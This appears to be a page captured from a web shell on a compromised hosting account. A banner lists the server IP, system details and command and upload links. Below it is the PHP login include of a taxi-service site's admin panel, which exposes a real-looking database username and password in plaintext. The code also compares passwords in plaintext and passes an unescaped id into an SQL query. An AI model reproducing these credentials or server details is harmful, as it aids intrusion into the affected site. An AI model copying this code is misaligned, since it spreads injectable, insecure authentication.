|
Server IP : 103.53.40.154 / Your IP : 52.14.88.137 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/bhatiataxiservice.in/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
// connect to database
// $db = mysqli_connect('localhost', 'root', 'password', 'db-name');
$db = mysqli_connect('localhost', 'ppcad7no_bhatiataxiservice', 'NYHm@Vl.P;bt', 'ppcad7no_bhatiataxiservice');
// variable declaration
$username = "";
$email = "";
$errors = array();
if (isset($_POST['login_btn'])) {
login();
}
// LOGIN USER
function login(){
global $db, $username, $errors;
// grap form values
$username = e($_POST['username']);
$password = e($_POST['password']);
// make sure form is filled properly
if (empty($username)) {
array_push($errors, "Username is required");
}
if (empty($password)) {
array_push($errors, "Password is required");
}
// attempt login if no errors on form
if (count($errors) == 0) {
// $password = md5($password);
// Query for login_tbl
$query1 = "SELECT * FROM login_tbl WHERE username='$username' AND password='$password' AND admin_status='Active' LIMIT 1";
$results1 = mysqli_query($db, $query1);
if (mysqli_num_rows($results1) == 1) {
// check if user is admin or user
$logged_in_user = mysqli_fetch_assoc($results1);
if ($logged_in_user['user_type'] == 'supadmin') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: index.php');
} else if ($logged_in_user['user_type'] == 'admin') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: index.php');
} else if ($logged_in_user['user_type'] == 'user') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: index.php');
} else {
$_SESSION['msg'] = "Invalid user type";
header('location: login.php');
}
} else {
$_SESSION['msg'] = "Invalid username or password";
header('location: login.php');
}
$query2 = "SELECT * FROM tbl_member WHERE username='$username' AND password='$password' LIMIT 1";
$results2 = mysqli_query($db, $query2);
if (mysqli_num_rows($results2) == 1) {
$logged_in_user = mysqli_fetch_assoc($results2);
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location:member_home.php');
}
// No user found in either table
array_push($errors, "Wrong username/password ");
}
}
function isAdmin()
{
if (isset($_SESSION['user']) && $_SESSION['user']['user_type'] == 'admin' ) {
return true;
}else{
return false;
}
}
// return user array from their id
function getUserById($id){
global $db;
$query = "SELECT * FROM login_tbl WHERE id= $id";
$result = mysqli_query($db, $query);
$user = mysqli_fetch_assoc($result);
return $user;
}
// escape string
function e($val){
global $db;
return mysqli_real_escape_string($db, trim($val));
}
function display_error() {
global $errors;
if (count($errors) > 0){
echo '<div class="error">';
foreach ($errors as $error){
echo $error .'<br>';
}
echo '</div>';
}
}
function isLoggedIn()
{
if (isset($_SESSION['user'])) {
return true;
}else{
return false;
}
}
if (isset($_GET['logout'])) {
session_destroy();
unset($_SESSION['user']);
header("location: login.php");
}
function my_prepared($sql) {
global $db;
$stmt = mysqli_prepare($db, $sql);
if (!$stmt) {
die("Prepared statement error: " . mysqli_error($db));
}
return $stmt;
}
?>